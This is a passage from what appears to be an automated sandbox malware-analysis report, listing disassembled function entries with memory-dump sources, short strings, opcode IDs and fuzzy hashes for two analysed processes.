                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3426598015.00007FFD34B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34b90000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa00aa914622ec0993c6074bdac5a7e609c173affda172c6eccec621e739c4d0
                                      • Instruction ID: 2f05144fe51952793f73936a5d6ccaf9476214ce1262706dba39e2d2f9a55c20
                                      • Opcode Fuzzy Hash: aa00aa914622ec0993c6074bdac5a7e609c173affda172c6eccec621e739c4d0
                                      • Instruction Fuzzy Hash: A0B092315456098BD298A664B0910E07261AB4A2197A110A8E809CA392CB6F9CD38680
                                      Function 00007FFD346706C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: adcc7354541408074ee5c792c912e30747a66a74d7914581dab1ab40c654bd21
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 69B01204F5682F00A804397A0CD20E4B8405B46104FC05070D70CC00C6984D10D42252
                                      Function 00007FFD34673A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: 2a5b665479dfc35e86a068d77f527f98521f8822be16b1209a46d3a6d7e9adbd
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 4DC02B10F0C02480E7254D304C911FD39401F5A300F05C272C00ED2081CE3C68002100
                                      Function 00007FFD34A6D46F Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c2fcdc4785a08d3d575677699677f16385c44b2a5ee34cf2b14f13c9d14e791a
                                      • Instruction ID: 46bb6fab1c3ffda16e696249db7ab9db06778ed13afa34ef402b2eea18ebd4c5
                                      • Opcode Fuzzy Hash: c2fcdc4785a08d3d575677699677f16385c44b2a5ee34cf2b14f13c9d14e791a
                                      • Instruction Fuzzy Hash: B5C04C14F0E2435BE6215A6448F517816910F072997650575D71AEA2C3DD5C784472A1
                                      Function 00007FFD34A6722F Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                      • Instruction ID: 4114d0ac72b9a0d941071ad4820583b509b6c3f74a3c799203e738082f1185d1
                                      • Opcode Fuzzy Hash: b0511c00046cd78565544cd89eb027ea0736e200201f3d3ad77b1928229fa64b
                                      • Instruction Fuzzy Hash: 5FC02B40F0D36307E720147004F407C16800F472057640071D307C90CBDC0C28003311

                                      Non-executed Functions

                                      Function 00007FFD346709B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                      • Instruction ID: a82bc48983393078abda6fc7e0eb66b317426235214540b8481d0ad001dd28f7
                                      • Opcode Fuzzy Hash: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                      • Instruction Fuzzy Hash: 78517117B5C67246E22137FDB4611FF6B88DFE537EB488677D28CD90838C08648586E5
                                      Function 00007FFD34B9486F Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3426598015.00007FFD34B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34b90000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $#$-$3
                                      • API String ID: 0-426809724
                                      • Opcode ID: 2c05efe29ab719b961b401add08d71e979ed0d9b715662b10f14507ad05f12eb
                                      • Instruction ID: 3ffc7c90420785e5d39f443849d54414450d929d270bf86a513017d71aa4936b
                                      • Opcode Fuzzy Hash: 2c05efe29ab719b961b401add08d71e979ed0d9b715662b10f14507ad05f12eb
                                      • Instruction Fuzzy Hash: 3211653091C2198BEB699A08D4D23B47394FB55704F204179CDAE83683EE3D796657C7

                                      Executed Functions

                                      Function 00007FFD34690D4C Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5X_H
                                      • API String ID: 0-3241812158
                                      • Opcode ID: f9e2cc86e4e4ebda3ad85d357454745da565930ba0d0ebf8b83d283d8cab2355
                                      • Instruction ID: d3a8b4d97364c396c4950e96e505750939111d91b0679092b2679adb955b410b
                                      • Opcode Fuzzy Hash: f9e2cc86e4e4ebda3ad85d357454745da565930ba0d0ebf8b83d283d8cab2355
                                      • Instruction Fuzzy Hash: E891D471A08B9E8FE79ADF68C8657E97FE1FB66310F4400AEC489D72D2CAB91411C741
                                      Function 00007FFD34690E43 Relevance: .2, Instructions: 170COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85401d5a5573eb4ae3834c80a5087adc549e54aeb64b5e09fa143a5e38ec78a6
                                      • Instruction ID: a9a0ea64a45fdc81a10af25559eeef48fbcc60b0cb10388ef6024b01d4cdaa6a
                                      • Opcode Fuzzy Hash: 85401d5a5573eb4ae3834c80a5087adc549e54aeb64b5e09fa143a5e38ec78a6
                                      • Instruction Fuzzy Hash: BD51CF72A18F9D8AE799CF9CC8A97A87FE1FB9A314F40016ED089D37D1CAB914518341
                                      Function 00007FFD346908D0 Relevance: .2, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e6cf953e82ca2e1a256c86782814640ba91cf55ce3bb99fdda251409226c254
                                      • Instruction ID: e1b0662f5eb5ceb5b29cd5c08468d3d64e57452f9ae54cb68255f8a5d620ceba
                                      • Opcode Fuzzy Hash: 9e6cf953e82ca2e1a256c86782814640ba91cf55ce3bb99fdda251409226c254
                                      • Instruction Fuzzy Hash: 8A41543270CA254FD725EBACE4E99FA7BD0EF8632570405BBD189CB067DD14A88287C1
                                      Function 00007FFD3469090D Relevance: .1, Instructions: 146COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82b9c714b14c5f4c39e4c9f1b7053fad736029e4176d56831ce576d34f1bc789
                                      • Instruction ID: 4c35e944e6f87b369b850a46e2f0345c843698be6d62327f9eca36bcf3a00e35
                                      • Opcode Fuzzy Hash: 82b9c714b14c5f4c39e4c9f1b7053fad736029e4176d56831ce576d34f1bc789
                                      • Instruction Fuzzy Hash: F9415B12B4D6A61EE715BBF8A4BA1FA7BD0DF56325B1404BFD18DC71E3CC1C68828284
                                      Function 00007FFD34690998 Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33e1ebaec29d3728da0e5093c51d4b788ee50bca6a58a65fc807ca43ecdd83bf
                                      • Instruction ID: 7fbf7f5b4bb33f465389d0c9b67fad6493970197fb9d1ae5fc91d77dbb788ccf
                                      • Opcode Fuzzy Hash: 33e1ebaec29d3728da0e5093c51d4b788ee50bca6a58a65fc807ca43ecdd83bf
                                      • Instruction Fuzzy Hash: AD312921B0999D0FEB54AB6884AA6B97BD1EF99315B1400BED44DC32D3DC6CAC819341
                                      Function 00007FFD34690908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction ID: b4e8bf23edebf326d54642f1256673b116b9d61194b3aa82bee47c656b63fbb5
                                      • Opcode Fuzzy Hash: b3368c1844a52ee59a3a97208f294735a0dec08c23f3eb80fd00a53f5a0f1fa5
                                      • Instruction Fuzzy Hash: 6A21F83130CC184FE768EA0CE889DB973D1EB5A32130101BAE58EC7165E951EC8287C1
                                      Function 00007FFD3469116D Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a73f29549d35d370d54a24bf8502d82d6ad51f498005f7062defa35ad45cb0b
                                      • Instruction ID: cd69cde5124f82c674d77bc8d73ecaeb3c5739081d37ec43b701696efcc61f81
                                      • Opcode Fuzzy Hash: 5a73f29549d35d370d54a24bf8502d82d6ad51f498005f7062defa35ad45cb0b
                                      • Instruction Fuzzy Hash: 4041B531A0D6598FEF89EF68C8A59F97BF1EF5A300B1405BAD009D7193DA6DA841C740
                                      Function 00007FFD34690960 Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c7714c2f7dad4addb871d4162e05484ecb58a0b8ef0f54200a0e90ad52befb5b
                                      • Instruction ID: ce27ff7f33c3d8fae0cd0db88da114a5a77ab09ed6fe998d64630064f88f072a
                                      • Opcode Fuzzy Hash: c7714c2f7dad4addb871d4162e05484ecb58a0b8ef0f54200a0e90ad52befb5b
                                      • Instruction Fuzzy Hash: 77313911B0DAAA1EF764BAB8A4AA1FA77C5DF96325B1404BED44EC31D3CC5C6C425284
                                      Function 00007FFD34690C25 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54fdb1647504594c0093e17d34a512e18fd154d8c86cd96c921115281bae95fa
                                      • Instruction ID: 846b4d56fda446457f2327447c1104c0b210ea42c1c8ca2fb4a248a2ce48104a
                                      • Opcode Fuzzy Hash: 54fdb1647504594c0093e17d34a512e18fd154d8c86cd96c921115281bae95fa
                                      • Instruction Fuzzy Hash: 8F316C76B0DB598FE7119FA898A11ED3BA0EF43324F1440B6D148CB1C3C97C2446D781
                                      Function 00007FFD346969E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f72e2f8bc80a17690d0848eb6c274148ac51d8100dd549b49ff85e4019d5311
                                      • Instruction ID: 288b7c537c9ce2a4f435521a9602b61c648921ddd39709957274519d54138ad8
                                      • Opcode Fuzzy Hash: 9f72e2f8bc80a17690d0848eb6c274148ac51d8100dd549b49ff85e4019d5311
                                      • Instruction Fuzzy Hash: 3D212C30E186698FDB65DF04C4A4BEDB3E1FB59314F1085EAC50EE3291CA79AE81CB40
                                      Function 00007FFD34690C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02c50d47cb02605bc94dfeb53cbab09840027d48ec65975aa75282f97923a5f3
                                      • Instruction ID: 2525317c77ab5de0c386867e2e3942c844009960e1dc2e6665701f10f1c1f6f3
                                      • Opcode Fuzzy Hash: 02c50d47cb02605bc94dfeb53cbab09840027d48ec65975aa75282f97923a5f3
                                      • Instruction Fuzzy Hash: 64110276B0DB598FE702DF6888A10ED7BB0EF43310F1444B7C144DB292D97C25469781
                                      Function 00007FFD34690C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f42fc00a0715bc61d77b22d58f22ad18b8ce2ec0e576cd875ad49b37009d59f9
                                      • Instruction ID: 9dd0e4345ddfff0d78ffcc9c283e2c0f9286926005443b1177b8b96c1bfaef04
                                      • Opcode Fuzzy Hash: f42fc00a0715bc61d77b22d58f22ad18b8ce2ec0e576cd875ad49b37009d59f9
                                      • Instruction Fuzzy Hash: 2D11AD76A0EB998FEB02DF6888A10ED7BB0EF53310F1544B6C144DB292DA7C26499781
                                      Function 00007FFD34690C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65e49202b3cf8e39388cae810a529a44912298b23f0f198ba9e513bfcdde4f37
                                      • Instruction ID: f294318c0ac0c85e283866d5aea4cc729a8ade9150fd567d596a8873768e2915
                                      • Opcode Fuzzy Hash: 65e49202b3cf8e39388cae810a529a44912298b23f0f198ba9e513bfcdde4f37
                                      • Instruction Fuzzy Hash: 04018C76A0E7898FEB12DF6488A00ED7BB0EF43310F1541F6C144DB292DA786A459781
                                      Function 00007FFD34690B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: fab944e319c1feb3e92c68a221436a8fdff2297cc52bc2b3e77900035b5644f2
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: 37D012345668098FC650EB28D9D5894BA90FB0A214B8901D0D40CC71A1D39A9894C701
                                      Function 00007FFD346906A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: 1dc40e4b13cd0e24aaa99327bff96a2b72f5a012074c7d030570574b51e93189
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 25C04C16F5AD3B01BC157D6E58E60FCA1406FD7A21FD51176D70CD00C59DCD20D52156
                                      Function 00007FFD346912B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: f08b973c628f22c78451e1f57d208aa1cd9d771bfa9d39f9ffd83c9f8a033d07
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: 5CC08C305208088FCA48EB28C98480433E0FB0A200BC10090E008C7170D269DCC1C740
                                      Function 00007FFD34693416 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62aa07c07376f1774e650223a47ef12a21032295cc80dc0d4398f63bb90c4d12
                                      • Instruction ID: 8496d9d07de950f336304766ffd4eaaedabf1ab3004c31b210bed8850606ff7d
                                      • Opcode Fuzzy Hash: 62aa07c07376f1774e650223a47ef12a21032295cc80dc0d4398f63bb90c4d12
                                      • Instruction Fuzzy Hash: 7BC04C11F18E7A46F666669484312BE04469F54759F540034E54ED63C6DD5C5F1112C7
                                      Function 00007FFD346906C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: 0e861303381caf619999a105ec1ac9ee3160302702a47f936a36cd7149efe04e
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 47B01204F5682F00A8043D7A08D20E470406B46510FC01074DA0CC008598CD20942242
                                      Function 00007FFD34693A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: be61b1e624d3aefda69dbf88129ba16d7977287dd2fa89b736bd07e7d49666bd
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 2FC09B21F1D525C1FB25593044551FD71555F5A304F554571C14EE7081DE7C59056541

                                      Non-executed Functions

                                      Function 00007FFD346909B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001C.00000002.2471023187.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_28_2_7ffd34690000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 03558a8e3500502994ab02c27dcf0c65853eaae07df8f034ca3a2474c2ac3052
                                      • Instruction ID: 5f21b53e61e4cc1205d7d0275d84a0ddc0e5568a2cd430bef4e8112bb6c1df3d
                                      • Opcode Fuzzy Hash: 03558a8e3500502994ab02c27dcf0c65853eaae07df8f034ca3a2474c2ac3052
                                      • Instruction Fuzzy Hash: 8551C503B4C66345E22237FDB4620FF6B88DFE237EB484677D18CE90934D19608686E5

                                      Executed Functions

                                      Function 00007FFD34691968 Relevance: 1.9, Strings: 1, Instructions: 606COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pt4
                                      • API String ID: 0-4061431716
                                      • Opcode ID: 273771fa9023695482042283e3c3871ff1ab3a51c6c4c57705e50d6e4bad3714
                                      • Instruction ID: 33920366c2ac64481eb3c9d6b9628a9298b523bebb7ee1c1971697de3a8c10bb
                                      • Opcode Fuzzy Hash: 273771fa9023695482042283e3c3871ff1ab3a51c6c4c57705e50d6e4bad3714
                                      • Instruction Fuzzy Hash: 59029961B1C66A0BF71D9E2888951F577D1EB93301F28867ED9DBC7187E96CA8078380
                                      Function 00007FFD34660D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5[_H
                                      • API String ID: 0-3279724263
                                      • Opcode ID: e57e60f19054fb2ce8140c80be211a07f0c8ed4c42c8fa13f7e5fd99daf92f42
                                      • Instruction ID: 2318c5f7aa5bf8f9b4add95d79ac643ecb94618377ee743271df43d72ae091a3
                                      • Opcode Fuzzy Hash: e57e60f19054fb2ce8140c80be211a07f0c8ed4c42c8fa13f7e5fd99daf92f42
                                      • Instruction Fuzzy Hash: 2891D275A58B994FE799DB98C8793A97FE2FBA6310F4000BAC049D72E2DB781811C700
                                      Function 00007FFD34660E43 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04f05a7e192685707685a19932e6312f5d86062be4b3fee0e2cb6229efe22a66
                                      • Instruction ID: b491190d96a649420bb1df9078e51f993d0cc3c4c5ba2772b4cf24fed9fe5db2
                                      • Opcode Fuzzy Hash: 04f05a7e192685707685a19932e6312f5d86062be4b3fee0e2cb6229efe22a66
                                      • Instruction Fuzzy Hash: 9551D176A58A598AE798DF9CC4B93A87FE2FB96320F50017EC049D77D1CBB91461C300
                                      Function 00007FFD3469B229 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.2544998388.00007FFD34691000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34691000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffd34691000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (yv4$I
                                      • API String ID: 0-1025576664
                                      • Opcode ID: 4b26bd5eff6e5621f1bd2e2795632eafae9ac5deae9627c1cdc90f95cca5c7ba
                                      • Instruction ID: 79ac970e786063f8eb1431adc73960f87e029d555d01e93018e3f97aa5ef7ea0
                                      • Opcode Fuzzy Hash: 4b26bd5eff6e5621f1bd2e2795632eafae9ac5deae9627c1cdc90f95cca5c7ba
                                      • Instruction Fuzzy Hash: DC11C421A0D3C84FDB5AAF3488A54E87FA0EF57610B4A00FBC589CB0A3D96C5848C701
                                      Function 00007FFD346937C9 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
